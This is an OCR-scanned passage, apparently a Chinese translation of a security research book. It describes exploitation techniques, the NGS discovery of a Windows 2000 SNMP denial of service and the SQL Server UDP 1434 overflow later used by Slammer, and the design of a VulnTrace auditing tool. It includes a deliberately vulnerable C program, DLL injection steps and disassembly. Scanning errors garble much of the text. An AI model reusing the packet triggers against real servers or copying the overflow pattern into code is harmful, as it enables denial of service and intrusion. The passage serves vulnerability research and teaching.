即使 每 次 只 能 往 内 存 写 一 个 字 节 ， 通常 也 能 上 传 并 执行 shellcode。 即 使 没有 足够 的 空间 容纳 
攻击 代码 (或 许 你 正在 溢出 的 是 32 字 节 的 缓冲 区 ， 尽 管 它 对 execve 或 winexec 来 说 足够 了 ， 并 且 
还 有 空间 剩余 )， 但 通过 把 小 负载 写 入 内 存 ， 仍 然 可 以 执行 任意 代码 。 只 要 有 多 次 机 会 ， 你 就 可 
以 在 内 存 中 组 装 破解 代码 ， 然 后 (一 旦 你 上 传 完整 个 载荷 〉 触 发 它 ， 因 为 你 已 经 知道 它 在 哪儿 。 
这 和 我 们 破解 格式 化 串 bug 时 所 使 用 的 方法 类 似 。 

我 们 甚至 可 以 用 这 个 方法 破解 堆 溢 出 ， 尽 管 这 要 求 目 标 进 程 必须 擅长 处 理 异 常 。 你 只 需 用 
write anything anywhere 原 语 重 复写 入 , 组 装载 荷 , 然后 通过 改写 函数 指针 、 异 常 处 理 程序 、VPTR 
等 手段 触发 它 。 

4. 与 上 下 文 无 关 的 长 度 限制 

有 时 候 ， 在 一 组 给 定 的 输入 中 可 以 多 次 提交 一 个 给 定 的 数据 条 目 〈 昌 然 对 数据 的 每 个 实例 
都 做 了 限制 ， 但 这 些 数据 是 在 限制 检查 之 后 连接 成 一 个 单一 的 条 目的 ， 从 而 可 以 超出 之 前 的 限 
制 )。 

比较 好 的 例子 是 用 于 欺骗 Web 入 侵 预 防 技 术 上 下 文 的 HTTP hostheader 字 段 。 对 它们 的 header 
分 别 进行 处 理 并 不 罕见 。( 例 如 ) Apache 在 接收 数据 之 后 将 把 这 些 host header 连 接 成 一 个 长 的 host 
header， 从 而 有 效 绕 过 host header 的 长 度 限 制 。IS 也 有 类 似 的 问题 。 

你 可 以 在 通过 名 字 识 别 数 据 条 目的 协议 里 使 用 这 个 方法 ， 例 如 SMTP、HTTP 参 数 、 表 单 域 
和 cookie 变 量 、HTML 和 XML 标记 属性 以 及 任何 通过 名 字 接 收 参数 的 函数 调用 机 制 。 
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19.5 Windows 2000 SNMP DOS 


尽管 这 不 是 激动 人 心 的 bg， 但 它 很 好 地 解释 了 用 工具 进行 调查 分 析 的 原理 。 可 以 在 
support.microsoft.com/default.aspx?scid-kb;en-us;Q296815 $k | Ej Jt 4H X If] Microsoft Knowledge 
Base 文章 ，NGS 的 报告 可 以 在 www.ngssoftware.com/advisories/snmp-dos/ 找 到 。 

我 们 在 测试 某 些 SNMP walk code〈 公 用 的 SNMP 实 现 ) 时 感到 疲倦 了 ， 因 此 ， 临 时 决定 审计 
微软 的 SNMP 守 护 程序 ， 看 它 是 否 有 溢出 问题 。 我 们 用 调试 器 附 上 SNMP 的 进程 ， 用 RegMon、 
FileMon 和 HandaleEx 监 视 它 打开 的 资源 ， 用 性 能 监视 器 查看 它 使 用 的 资源 ， 然 后 开始 测试 ， 手 动 
发 出 一 些 畸 形 〈 长 度 不 一 致 等 ) BER 结 构 的 请 求 。 什 么 也 没 发 现 ， 因 此 ， 当 我 们 遍历 整个 树 时 ， 
经 常会 看 一 下 SNMP OID 会 出 现在 哪里 。 

很 遗憾 ， 没 有 发 现 有 趣 的 东西 ， 但 是 当 我 们 查看 性 能 监视 器 时 ， 却 发 现 SNMP 守 护 进程 大 概 
占用 了 30MB 内 存 。 

运行 男 一 个 SNMP walk code， 系 统 又 为 它 分 配 了 许多 内 存 。 因 此 ， 我 们 开始 单 步 调试 SNMP 
walk code， 发 现 系 统 为 SNMP 进 程 分 配 了 大 量 的 内 存 。 最 后 我 们 发 现 ， 只 要 在 LanMan mib 里 请 
求 与 打印 机 相关 的 值 时 ， 就 会 出 现 这 个 问题 。 

一 个 SNMP 请 求 《 更 确切 地 说 是 单个 UDP 包 〉 就 占用 约 30MB 内 存 。 这 样 的 话 ， 我 们 可 以 
轻易 〈 且 十 分 快速 消耗 完 所 有 的 内 存 ， 如 果 攻 击 者 发 送 上 和 于 个 这 样 的 包 ， 被 攻击 的 机 器 就 废 
了 不 能 创建 新 进程 ， 也 不 能 创建 新 窗口 ， 甚 至 不 能 登录 系统 (可 能 是 为 了 关闭 SNMP 服 务 或 
服务 器 )。 因 为 GINA (Graphical Identification and Authentication， 控 制 登录 的 DLL) 没有 足够 的 
内 存 去 为 了 获取 用 户 的 证 书 〈 和 赁 证》 而 创建 对 话 框 ， 因 此 ， 这 时 唯一 的 解决 办 法 就 是 关闭 电源 。 

在 这 个 例子 里 ， 能 发 现 这 个 bug 是 因为 我 们 仔细 查看 了 内 存 的 使 用 情况 。 如 果 我 们 没有 注意 
到 内 存 的 使 用 情况 ， 可 能 永远 都 不 会 发 现 这 个 bug。 
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前 面 的 例子 介绍 了 另 一 个 发 现 DOS 攻 击 的 精彩 技术 一 一 近 距 离 查 看 资源 的 使 用 情况 .很 多 大 
型 程序 都 有 各 种 各 样 的 资源 泄露 问题 ， 也 很 难 从 根本 上 消除 它 。 使 用 好 的 工具 可 以 轻而易举 地 发 
现 这些 错 误 ， 但 几乎 不 可 能 从 根本 上 消除 它 。 那 我 们 应 该 怎样 监视 这 种 情况 呢 ? 

在 Linux 里 , proc 树 为 我 们 提供 了 丰富 的 信息 (man proc), 它 可 以 列 出 进程 打开 的 文件 (fd)、 
进程 映射 的 内 存 区 域 Cmaps) 和 用 字 节 表示 的 虚拟 内 存 的 大 小 〈stat/vsize)。statm 也 可 以 派 
上 用 场 ， 它 提供 了 基于 页 面 的 内 存 状态 信息 。 

在 Windows 里 稍 有 不 同 ， 你 可 以 用 任务 管理 器 查看 资源 使 用 的 大 致 情况 ， 因 为 可 以 轻松 改变 
processes 选项 卡 里 显示 的 内 容 。 要 找 的 有 用 信息 有 handle count. memory usage 和 vm size. 

监视 正在 使 用 的 (如 果 你 认真 准备 工具 的 话 ) 资源 的 一 个 比较 好 的 方法 是 用 Windows 性 能 监 
视 器 。 在 Windows 2000 里 ， 可 以 直接 运行 perfmon .msc 启 动 性 能 监视 器 ,也 可 以 从 管理 工具 里 启 
动 它 。 

性 能 监视 器 可 以 为 我 们 提供 非常 丰富 的 进程 信息 ,我们 可 以 从 自 定义 的 直方 图 显示 的 内 容 中 
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选择 感 兴趣 的 内 容 。 这 样 的 话 ， 我 们 就 可 以 看 到 资源 使 用 情况 的 连续 性 视图 ， 从 而 了 解 资 源 使 用 
的 趋势 (pattern)， 这 比 单 点 统计 直观 得 多 。 

在 测试 特殊 进程 时 ， 可 在 视图 里 加 入 计数 器 〈 通 常 是 process 性 能 对 象 )， 如 句柄 数 、 线 程 
数 、 内 存 使 用 状态 等 。 如 果 你 持续 监视 这 些 数 据 ， 很 快 就 能 发 现 资 源 泄露 DOS 问 题 。 


19.7 SQL-UDP 


Slammer Xt £f] Fi SQL-UDP bug 进 行 攻击 和 传播 。NGS 的 报告 可 在 www.ngssoftware.com/ 
advisories/mssgl-udp.txt 找 到 。 

其 实 我 们 是 在 偶然 的 情况 下 发 现 这 个 错误 的 。 在 一 次 为 客户 举办 的 定制 课程 中 ， 客 户 要 求 
NGS 查 看 SQL Server 文 持 哪 些 协 议 ， 因 为 他 们 担心 客户 端的 安全 性 。 很 显然 ， 客 户 知道 他 们 网 络 
中 到 处 都 有 UDP 包 ， 也 知道 伪造 UPD 包 的 可 能 性 ， 但 客户 真正 关心 的 是 ， 这 个 奇怪 的 UDP 协 议 是 
否 会 带 来 风险 ， 也 想 弄 清楚 是 否 应 该 在 网 络 里 阻塞 这 种 UDP 数 据 包 。 在 了 解 这 些 信息 后 ，NGS 
小 组 开始 审计 这 个 协议 。 

通过 Chip Andrews 公 开 的 信息 及 他 提供 的 优秀 工具 sqlping，NGS 注 意 到 : 当 发 送 的 UDP 包 
中 包含 0x02 时 ， 目 标 SQL Server 将 用 连接 运行 在 主机 上 的 SQL Server 的 各 种 实例 的 协议 细节 来 响 
应 。 

因此 ， 接 下 来 应 该 查看 还 有 何 字 节 可 用 于 包头 《0x00、0x01、0x03 等 )。NGS 用 FileMon、 
RegMon、 调 试 器 等 工具 研究 SQL Server 的 实例 ， 开 始 构造 请 求 。 

David〈 通 过 RegMon) 注意 到 当 UDP 包 的 第 一 个 字 节 是 0x04 时 ，SQL Server 试 图 打开 如 下 形 
式 的 注册 表 键 值 ; 


HKLM\Software\Microsoft\Microsoft SQL 
ServerN«contents of packet» MMSSQLServerNCurrentVersion 


接 下 来 要 做 的 显然 是 在 包 尾 添加 大 量 的 字 节 。SQL Server 一 定 会 因为 普通 的 栈 溢出 而 出 问 
题 。 

客户 应 该 认真 考虑 在 全 网 中 阻塞 UDP 1434 端 口 ， 其 理由 是 不 言 而 喻 的 。 至 此 ， 整 个 过 程 大 
概 花 了 五 六 分 钟 ，NGS 接 下 来 开始 调查 其 他 的 情况 。 

除了 ox04 外 ， 以 其 他 字 节 开始 的 包 也 展示 了 有 趣 的 行为 。 当 0x08 后 紧 跟 长 字符 串 、 冒 号 、 
数字 时 , 将 触发 堆 溢出 .0x0a 将 引起 SQL Server 用 包含 0ox0a 的 包 回 应 ,因此 , 你 可 以 伪造 SQL Server 
的 源 地 址 ， 然 后 发 送 包 含 ox0a 的 包 到 另外 的 SQL Server， 这 样 将 发 起 消耗 网 络 资源 的 拒绝 服务 。 


19.8 小 结 


先 抛 开 令 人 头痛 的 技术 ， 关 注 一 下 与 漏洞 研究 有 关 的 社会 问题 。SQL-UDP 错 误 本 身 并 不 可 
怕 ， 可 怕 的 是 发 现 它 的 速度 ， 仅 仅 花 了 五 六 分 钟 ! 显然 ， 既 然 我 们 能 这 人 么 快 地 发 现 它 ， 那 么 那些 
没什么 社会 责任 感 的 人 也 能 很 快 发 现 它 ， 并 利用 它 损害 系统 。 我 们 在 发 现 这 个 漏洞 后 ， 通 过 正常 
的 渠道 向 微软 通告 ， 并 与 微软 携手 宣传 它 的 危害 性 ， 努 力 让 所 有 的 公司 打上 补丁 ， 并 在 网 络 里 阻 
3EUDP 1434 端 口 〈 只 有 在 SQL 客户 端 不 确定 怎样 连 到 SQL Server 时 ， 才 会 使 用 这 个 端口 )。 


19.8 小 结 — 401 





AM, RNA, HEALS R. BRKT NOTA, HA BOAR 
到 是 谁 )》 利 用 这 个 漏洞 写 了 一 个 蠕虫 ， 并 放 到 互联 网 上 。 这 就 是 臭名 昭著 的 SQL Slammer, CH 
传播 严重 阻塞 了 互联 网 的 通信 ， 使 数 以 千 计 的 公司 管理 者 头痛 不 已 。 

虽然 Slammer 的 影响 没有 进一步 扩大 ， 但 人 们 没有 充分 保护 自己 来 防范 它 却 是 最 让 人 郁 闽 
的 。 即 使 在 将 来 ， 也 很 难 只 依靠 安全 公司 来 阻止 此 类 事件 的 发 生 。 在 流传 其 广 的 案例 中 ， 如 
Slammer, Code Red 〈 利 用 了 Riley Hassel 发 现 的 .ida bug)、Nimda (同样 的 错误 ) 和 Blaster Kf di 
(利用 了 Last Stages of Delirium 小 组 发 现 的 RPC-DCOM 漏 洞 )， 相 关 的 公司 和 厂商 携手 工作 ， 确 保 
公布 漏洞 之 前 ， 先 发 布 补丁 和 相关 信息 。 但 是 ， 即 使 有 这 些 努 力 ， 还 是 有 人 编写 利用 这 些 bug 的 
蠕虫 并 有 释放 它 ， 从 而 造成 大 面积 的 破坏 。 

当 这 类 事情 发 生 时 ， 有 人 建议 安全 研究 者 应 该 停止 研究 软件 的 缺陷 , 因为 他 们 觉得 是 安全 研 
究 者 发 现 的 漏洞 ， 才 造成 今天 这 种 局 面 ， 却 没有 意识 到 停止 研究 可 能 会 造成 更 坏 的 影响 。 因 为 这 


不 是 研 穿 者 制造 的 错 课 . AAT Be SR a ee eu a ce A eal 
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SJ 找 安全 漏洞 ， 不 仅 耗 时 长 ， 而 且 还 很 枯燥 。 因 此 ， 我 们 打算 开发 一 个 工具 包 ， 以 帮 有 我 

飞 二 们 寻找 软件 里 的 错误 ， 从 而 在 一 定 程度 上 节省 时 间 ， 提 高 效率 。 工 具 包 应 该 由 实用 程 
序 和 技术 组 成 ， 可 以 审计 源码 和 二 进 制 码 ， 当 然 ， 也 应 该 可 以 审计 运行 中 的 程序 。 我 们 把 这 些 工 
具 分 为 两 类 : 主动 审计 工具 〈 例 如 第 17 章 的 模糊 测试 工具 ) 和 被 动 监视 工具 。 通 过 使 用 不 同 的 工 
具 ， 我 们 可 以 从 多 个 角度 检查 目标 程序 的 安全 性 。 当 然 ， 每 个 工具 和 技术 都 有 优 缺 点 ， 但 是 如 果 
把 它们 进行 整合 ， 扬 长 避 短 ， 就 能 把 它们 的 最 大 功效 发 挥 出 来 。 

2001 年 的 第 二 个 季度 ，EVE 项 目 正式 启动 了 。EVE 是 由 多 种 技术 结合 而 成 的 审计 解决 方案 。 
每 种 技术 单独 使 用 时 都 有 一 些 缺 点 ， 如 二 进 制 码 审计 技术 在 识别 潜在 的 安全 漏洞 时 很 有 效 ， 但 如 
果 目 标 程 序 没有 运行 ， 就 很 难 验证 漏 润 的 存在 。 通 过 构建 二 进 制 码 审计 解决 方案 , 我 们 可 以 在 目 
标 程序 运行 时 ， 对 它们 进行 审计 ， 跟 踪 程 序 执行 ， 了 解 触发 潜在 安全 漏洞 的 代码 路 径 。 这 个 新 的 
审计 和 解决 方案 允许 我 们 跟踪 、 分 析 漏 洞 ， 因 此 将 它 命名 为 漏洞 跟踪 。 现 有 的 跟踪 技术 主要 是 监视 
系统 调用 和 基本 API 调 用 ， 我 们 的 审计 解决 方案 监视 所 有 可 能 引发 漏洞 的 函数 的 使 用 情况 。 

EVE 博 采 众 家 之 长 ， 其 功能 包括 二 进 制 码 分 析 、 调 试 分 析 、 漏 洞 跟踪 以 及 映像 重 写 。 它 已 经 
发 现 了 一 些 公 开 的 漏洞 ， 如 今 在 我 们 的 工具 包 中 占有 重要 一 席 。 

本 章 将 通过 设计 、 实 现 简单 的 漏洞 跟踪 程序 ， 介 绍 怎样 构建 漏洞 跟踪 程序 的 每 个 组 件 。 这 个 
程序 允许 检查 目标 程序 是 否 存 在 缓冲 区 溢出 漏洞 。 


20.1 概述 


当前 的 审计 技术 ， 如 源码 审计 和 二 进 制 码 审 计 ， 一 般 用 于 审计 静态 程序 "。 发 现 软件 里 潜在 
的 漏洞 将 为 软件 公司 带 来 巨额 利润 。 源 / 二 进 制 审计 程序 可 以 深入 目标 程序 的 内 部 识别 漏洞 ,但 
不 能 确定 在 此 之 前 的 安全 性 检查 是 否 已 经 阻止 破解 这 个 漏洞 . 例如 ,审计 程序 可 以 确定 目标 程序 
正在 使 用 的 函数 《例如 strcpy) 是 否 有 问题 ， 但 是 它 无 法 确定 是 否 对 strcpy 做 过 输入 数据 已 经 
做 过 的 长 度 检查 或 其 他 处 理 ， 而 这 些 检查 可 以 破解 已 经 确认 的 strcpy 函 数 。 

即使 不 能 证 明 潜在 的 安全 问题 会 产生 直接 威胁 , 软件 公司 通常 也 会 有 相应 的 安全 策略 纠正 它 
们 。 但是， 那些 第 三 方 研究 者 很 难说 服 软件 公司 修正 他 们 软件 中 潜在 的 漏洞 。 研 究 者 通常 必须 在 
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产品 里 发 现 问 题 ， 并 通过 正式 的 流程 或 程序 提交 确凿 的 证 据 ， 只 有 这 样 ， 软 件 公司 才 可 能 迫 于 压 
力 而 修正 产品 中 的 问题 。 基 于 这 个 理由 ， 我 们 不 仅 要 在 软件 里 识别 漏洞 ， 通 常 还 要 找 出 这 个 漏洞 
的 执行 路 径 。 通 过 截取 程序 里 所 有 可 利用 的 点 ， 我 们 可 以 监视 它们 的 使 用 情况 ， 记 录 细 节 【〔 例 如 
移 到 特定 可 利用 的 函数 的 执行 路 径 )。 通 过 截取 程序 运行 ， 执 行 安全 检查 ， 我 们 可 以 确定 提交 给 
函数 的 参数 是 否 经 过 安全 性 检查 。 
20.1.1 脆弱 的 程序 

在 这 里 , 我 们 会 看 到 软件 产品 中 的 常见 安全 问题 一 -缓冲 区 溢出 ,虽然 程序 员 只 允许 lstrcpynA 
复制 15B CUSERMAXSIZE-1) 到 目标 缓冲 区 。 但 是 ， 他 犯 了 一 个 小 错误 ， 使 用 了 错 谋 的 长 度 ， 从 
而 允许 过 多 的 数据 复制 到 目标 缓冲 区 。 

许多 程序 员 喜 欢 用 define 定 义 长 度 。 但 一 般 来 说 ,使 用 aefine 时 可 能 会 无 意 中 引入 一 些 漏洞 。 

例子 里 的 check_username 函 数 有 一 个 缓冲 区 溢出 漏洞 。 提 交 给 1strcpyna 的 最 大 长 度 大 于 
目标 缓冲 区 的 长 度 ， 因 为 缓冲 区 仅 为 16B， 剩 下 的 16B 将 写 到 缓冲 区 外 ， 从 而 覆盖 保存 在 栈 帧 上 


的 EBP 和 EIP。 
/* Vulnerable Program (vuln.c)*/ 


#include <windows.h> 
#include <stdio.h> 


#define USERMAXSIZE 32 
#define USERMAXLEN 16 


int check username(char *username) 
( 
char buffer [USERMAXLEN] ; 


lstrcpynA(buffer, username, USERMAXSIZE-1); 


/* 

Other function code to examine username 
*/ 
return(0); 


} 


int main(int argc, char **argv) 
{ 
if(arge != 2) 
{ 
fprintf(stderr, "Usage: %s <buffer>\n", argv[0]); 
exit(-1); 
} 
while(1) 
{ 
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check username(argv[1]); 
Sleep(1000); 

} 

return (0); 


} 

在 编写 代码 时 ， 很 多 程序 员 喜 欢 使 用 一 些 辅助 开发 工具 Cl Visual Assist)， 这 些 工具 提供 了 
很 多 功能 ， 如 TAB 补 全 。 在 这 个 例子 里 ， 程 序 员 可 能 想 输入 USERMAXSITZE， 而 TAB 补 全 却 为 他 提 
供 了 USERMAXNAME， 假 如 程序 员 没有 仔细 检查 ， 而 是 想当然 地 按 下 TAB 键 ， 就 会 在 无 意 中 引 入 一 
系列 的 漏洞 。 恶 意 用 户 可 能 提交 大 于 15$B 的 用 户 名 ， 改 写 栈 上 的 数据 ， 还 可 能 进一步 利用 这 个 漏 
洞 控制 目标 程序 的 执行 流程 。 

那么 ,程序 员 应 该 怎样 审计 这 类 漏洞 呢 ? 如 果 源 码 审计 程序 使 用 内 置 的 预 处 理 程 序 ， 或 源码 
审计 者 处 理 已 经 过 预 处 理 的 源码 ,那么 源码 审计 方法 可 能 会 发 现 漏洞 。 二 进 制 码 审计 程序 一 般 是 
先 找 出 脆弱 的 函数 ， 然 后 根据 目标 缓冲 区 的 大 小 以 及 允许 传 给 函数 的 数据 长 度 来 识别 漏洞 。 如 果 
传递 的 数据 长 度 大 于 目标 缓冲 区 的 长 度 ， 二 进 制 码 审计 程序 就 会 报告 可 能 存在 漏洞 。 

如 果 目 标 缓冲 区 是 在 堆 上 分 配 的 呢 ? 因为 堆 里 的 内 容 是 运行 时 生成 的 , 所 以 堆 的 大 小 很 难 确 
Eo W / 二 进 制 码 审计 程序 对 于 已 分 配 的 目标 堆 块 的 实例 ， 可 能 会 尝试 检查 应 用 程序 的 代码 ， 然 
后 用 潜在 的 执行 流程 进行 交叉 引用 。 很 多 源 / 二 进 制 码 审计 解决 方案 的 开发 者 都 提 到 这 个 方法 ， 
但 是 “被 提议 ”并 不 等 于 “已 实现 ” 我 们 可 以 通过 检查 扒 块头 部 来 解决 这 个 问题 ， 在 必要 的 时 
候 ， 为 特殊 堆 里 的 相关 块 来 遍历 块 列表 。 多 数 编译 器 也 会 创建 自己 的 堆 。 如 果 我 们 希望 审计 特殊 
编译 器 生成 的 程序 ， 将 需要 在 审计 程序 中 增加 对 它们 特有 的 堆 的 分 析 功 能 。 

注意 例子 中 lstrcpynA 的 用 法 。1lstrcpynA 不 是 标准 的 C 运 行 时 函数 ， 而 是 由 微软 系统 DLL 
实现 的 ， 此 外 ， 它 接受 的 参数 和 strncpy 也 完全 不 同 。 每 个 操作 系统 为 了 自身 的 需求 ， 一 般 都 会 
创建 自 有 的 通用 C 运 行 时 函数 。 源 码 和 二 进 制 码 审计 技术 很 少 会 寻找 这 些 第 三 方 的 函数 。 这 类 函 
数 产生 的 问题 不 能 直接 通过 漏洞 跟踪 来 解决 ; 在 这 里 提 到 这 一 点 , 仅仅 是 为 了 显示 审计 系统 通常 
会 忽略 一 些 其 他 方法 。 

软件 保护 技术 的 出 现 , 严重 削弱 了 静态 二 进 制 码 审计 技术 的 功效 。 许 多 软件 保护 技术 企图 通 
过 加 密 和 压缩 代码 段 增 加 破解 软件 的 难度 。 尽 管 破 解 者 可 以 轻松 绕 过 这 些 保护 措施 ， 但 对 自动 审 
计 程 序 来 说 , 它们 通常 是 难以 逾越 的 障碍 。 所幸 的 是 , 绝 大 多 数 的 保护 措施 只 对 静态 程序 起 作用 。 
一 且 程 序 被 解密 /解压 缩 再 加 载 到 内 存 空 间 后 ， 这 些 保护 措施 就 不 复 存 在 了 。 

函数 指针 和 回调 (callback) 的 使 用 也 对 二 进 制 码 审计 解决 方案 提出 了 挑战 。 它 们 中 的 大 部 
分 在 运行 时 才 被 初始 化 ， 我 们 只 能 参照 进入 点 的 上 下 文 来 分 析 程 序 的 执行 流程 。 因 为 此 时 ， 这 些 
引用 还 没有 被 初始 化 ， 所 以 使 分 析 更 加 复杂 。 

既然 我 们 面前 还 有 这 么 多 问题 , 那 就 介绍 一 下 怎样 通过 设计 漏洞 跟踪 程序 来 解决 它们 。 从 这 
里 开始 ， 我 们 将 调用 漏洞 跟踪 程序 VulnTrace。 虽 然 它 有 一 定 的 局 限 性 ， 但 为 我 们 提供 了 一 个 起 
点 ， 有 助 于 提高 我 们 在 漏洞 跟踪 技术 方面 的 兴趣 。 


20.1.2 组 件 设计 
为 了 监视 示例 程序 ， 我 们 首先 要 建立 必要 的 组 件 。 和 其 他 项 目 一 样 ， 为 了 发 挥 VulnTrace 的 
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作用 ， 我 们 需要 定义 必要 的 组 件 。 

我 们 需要 直接 、 频 繁 地 访问 目标 程序 。 因 为 需要 读 入 进程 空间 的 部 分 内 存 ， 并 把 执行 流程 重 
定向 到 代码 ， 所 以 需要 把 这 个 组 件 安置 在 目标 程序 的 虚拟 地 址 空间 内 。 我 们 的 解决 办 法 是 把 
VulnTrace 编 译 成 DLL， 然 后 注入 到 目标 进程 内 部 。 这 样 的 话 ，VulnTrace 就 可 以 从 目标 程序 的 内 
存 空间 观察 目标 程序 ， 也 可 以 很 方便 地 修改 目标 程序 的 行为 。 

为 了 弄 清 楚 问 题 所 在 (如 程序 使 用 的 各 种 反常 的 或 不 安全 的 函数 )， 我 们 需要 分 析 已 加 载 的 
模块 。 而 且 ， 这 些 函 数 有 可 能 是 被 导入 、 静 态 链接 或 内 联 到 程序 内 的 ， 因 此 需要 分 析 二 进 制 码 ， 
从 而 定位 这 些 函 数 。 

为 了 方便 VulnTrace 检 查 函 数 的 参数 ， 我 们 需要 截获 函数 的 执行 。 使 用 “函数 挂钩 ”技术 解 
决 这 个 问题 。 函 数 挂钩 是 用 我 们 自己 DLL 里 的 函数 替换 其 他 DLL 里 的 函数 。 

最 后 ， 一 旦 数据 收集 完毕 ， 我 们 需要 把 它们 交 给 审计 者 ， 因 此 必须 实现 某 种 交付 机 制 。 在 这 
个 例子 里 ， 我 们 用 Windows 自 带 的 调试 消息 系统 ， 像 API 调 用 那样 把 消息 交 给 调试 系统 。 为 了 接 
收 这 些 消 息 ， 需 要 使 用 微软 的 Detours 工 具 〈 后 面 讨 论 )。 它 是 免费 工具 ， 可 以 在 互联 网 上 找到 。 

到 目前 为 止 ， 我 们 的 VuinTrace 组 件 包 括 : 

O 进程 注入 

口 二 进 制 码 分 析 

O 函数 挂钩 

a 数据 收集 和 交付 

我 们 先 详细 介绍 整个 设计 理念 和 每 个 组 件 的 特性 , 最 后 把 它们 组 合 起 来 , 作为 我 们 的 第 一 个 
漏洞 跟踪 程序 。 

1. 进程 注入 

为 了 跟踪 调用 脆弱 函数 的 行为 , 需要 用 VulnTrace 把 目标 程序 的 执行 流 重 定向 到 可 控 区 域 ( 可 
以 在 这 个 区 域 检 查 脆弱 函数 的 调用 行为 )， 除 此 之 外 ， 还 需要 经 常用 VulnTrace 检 查 目 标 进 程 的 地 
址 空间 。 虽 然 可 以 在 程序 外 做 这 些 事 ， 但 这 样 的 话 ， 我 们 必须 要 开发 一 个 把 地 址 空间 与 目标 地 址 
空间 分 开 的 转换 方案 , 而 且 它 的 开销 会 像 它 的 实现 那样 不 切实 际 。 比 较 可 靠 的 方法 是 把 代码 注入 
目标 进程 的 内 存 空间 。 我 们 使 用 Detours 套 件 来 实现 ，Detours 可 以 从 http://research.microsoft.com/ 
sn/detours FR, 它 包括 了 许多 有 用 的 函数 和 例子 代码 , 我 们 可 以 利用 它 来 迅速 开发 出 漏洞 跟踪 解 
RAR. 

把 VulnTrace 编 译 成 DLL， 然 后 通过 Detours API 加 载 到 目标 进程 的 内 存 空 间 。 如 果 你 想 自 己 
写 函 数 ， 把 自己 的 库 函 数 加 载 到 目标 进程 里 ， 可 以 参考 下 面 的 步骤 。 

(1) 在 进程 内 部 用 VirtualAllocEx 分 配 内 存 页 。 

(2) 为 LoadLibrary 调用 复制 必要 的 参数 。 

(3) 在 函数 内 部 用 createRemoteThread 调 用 LoadLibrary, 在 进程 的 地 址 空间 指定 参数 地 址 。 

2. 二 进 制 码 分 析 

我 们 需要 定位 被 监视 函数 的 每 个 实例 , 在 那里 可 能 存在 有 不 同 版 本 的 多 个 交叉 模块 。 我 们 将 
用 一 个 或 多 个 下 面 的 方案 ， 把 被 监视 的 函数 并 入 我 们 的 地 址 空间 。 
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e 静态 链接 

几乎 每 个 编译 器 都 有 自己 通用 的 运行 时 函数 库 。 在 编译 过 程 中 ,如果 编译 器 识别 出 脆弱 的 函 
数 ， 很 可 能 会 把 自己 的 函数 编译 到 目标 程序 里 。 例 如 ， 如 果 你 的 程序 中 使 用 了 strncpy 函 数 ， 微 
软 的 Visual C++ 会 把 它 自己 的 strncpy 实 现 静态 链接 到 程序 中 。 下 面 的 例子 摘自 编译 后 的 汇编 代 
码 ， 从 main 开 始 ， 调 用 函数 check_username， 然 后 调用 strncpy。 因 为 编译 器 自 带 的 运行 时 函 
数 库 里 有 strncpy 函 数 ， 因 此 ， 它 被 直接 链接 到 main 后 面 。 当 check_username 调 用 strncpyl, 
执行 流 将 正好 到 达 下 面 的 strncpy (位 于 虚拟 地 址 0x00401030)。 左边 是 虚拟 地 址 , 右边 是 指令 。 


check_username: 





00401000 push ebp 

00401001 mov ebp, esp 

00401003 sub esp,10h 

00401006 push OFh 

00401008 lea eax, [buffer] 
0040100B push dword ptr [username] 
0040100E push eax i 

0040100F call .Strncpy (00401030) 
00401014 add esp, 0Ch 

00401017 xor eax,eax 


00401019 leave 
0040101A ret 


main: 

0040101B push offset string "test" (00407030) 
00401020 call check username (00401000) 
00401025 pop ecx 

00401026 jmp main (0040101b) 
00401028 int 3 

00401029 int 3 

0040102A int 3 

0040102B int 3 

0040102C int 3 

0040102D int 3 

0040102E int 3 

0040102F int 3 

.strncpy: 

00401030 mov ecx,dword ptr [esp+0Ch] 
00401034 push edi 

00401035 test ecx, ecx 

00401037 je _Strncpy+83h (004010b3) 
00401039 push esi 

0040103A push ebx 

0040103B mov ebx,ecx 

0040103D mov esi,dword ptr [esp+14h] 
00401041 test esi,3 

00401047 mov edi,dword ptr [esp+10h] 
00401048 jne _strnepyt+24h (00401054) 


0040104D shr ecx, 2 
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如 果 我 们 想 截获 这 些 静 态 链接 的 脆弱 函数 ， 需 要 为 每 个 函数 定义 一 个 指纹 ,然后 用 指纹 扫描 
地 址 空间 里 的 每 个 模块 的 代码 ， 找 出 静态 链接 函数 。 

@ 导入 

许多 操作 系统 都 支持 动态 链接 库 ， 相 对 静态 链接 (通常 在 编译 时 被 链接 进程 序 ) 来 说 ,动态 
链接 比较 灵活 。 当 程序 员 在 程序 中 使 用 外 部 模块 中 明确 定义 的 函数 时 ,编译 器 必须 把 依赖 关系 编 
译 到 程序 里 。 当 程序 员 在 程序 中 使 用 这 些 例 程 时 ， 各 种 数据 结构 将 被 并 入 程序 的 映像 文件 。 在 加 
载 过 程 中 ， 系 统 加 载 器 针对 这 些 数据 结构 (或 “导入 表 ”) 进行 分 析 。 导 入 表 的 条 目 指定 将 要 被 
加 载 的 模块 。 对 每 个 将 被 导入 的 特定 模块 来 说 ， 都 有 一 个 函数 列表 。 在 加 载 过 程 中 ,被 导入 的 函 
数 地 址 保存 在 正 导 入 程序 的 模块 内 的 IAT (Import Address Table， 导 入 地 址 表 ) 里 。 

下 面 的 例子 里 有 一 个 例 程 check_username， 使 用 导入 函数 lstrcpynA。 当 check_username 
函数 执行 到 位 于 虚拟 地 址 90x0040100F 的 调用 指令 时 ,执行 流 将 被 重 定向 到 0x0040604c 中 保存 的 
地 址 。 这 个 地 址 是 我 们 脆弱 程序 中 的 一 个 IAT 条 目 。 它 代表 函数 1strcpyna 的 进入 点 地 址 。 


check_username: 


00401000 push ebp 

00401001 mov ebp, esp 

00401003 sub esp, 10h 

00401006 push 20h 

00401008 lea eax, [buffer] 

0040100B push dword ptr [username] 

0040100E push eax 

0040100F call dword ptr [ imp  lstrcpynA812 (0040604c)] 
00401015 xor eax,eax 


00401017 leave 
00401018 ret 


main: 

00401019 push offset string "test" (00407030) 

0040101E call check username (00401000) 

00401023 pop ecx 

00401024 jmp main (00401019) 

下 面 是 这 个 程序 的 IAT 快 照 。 在 函数 check_username 里 ， 调 用 指令 引用 的 地 址 如 下 。 
IAT 

偏 移 地 址 进入 点 地 址 

0040604C 7C4EFA6D <-- lstrcpynA entry point address 

00406050  7CAF4567 «-- other import function entry points 


00406054 7C4FAE05 
00406058 7C4FE2DC 
0040605C  77FCC7D3 


正如 你 看 到 的 那样 ，IAT 里 的 地 址 0x7c4EFA6D 实 际 上 是 1stzrcpyna 进 入 点 地 址 的 引用 。 


_lstrepynA@l12: 
7C4EFA6D push ebp 
7CAEFAGE mov ebp,esp 


7C4EFA70 push OFFh 
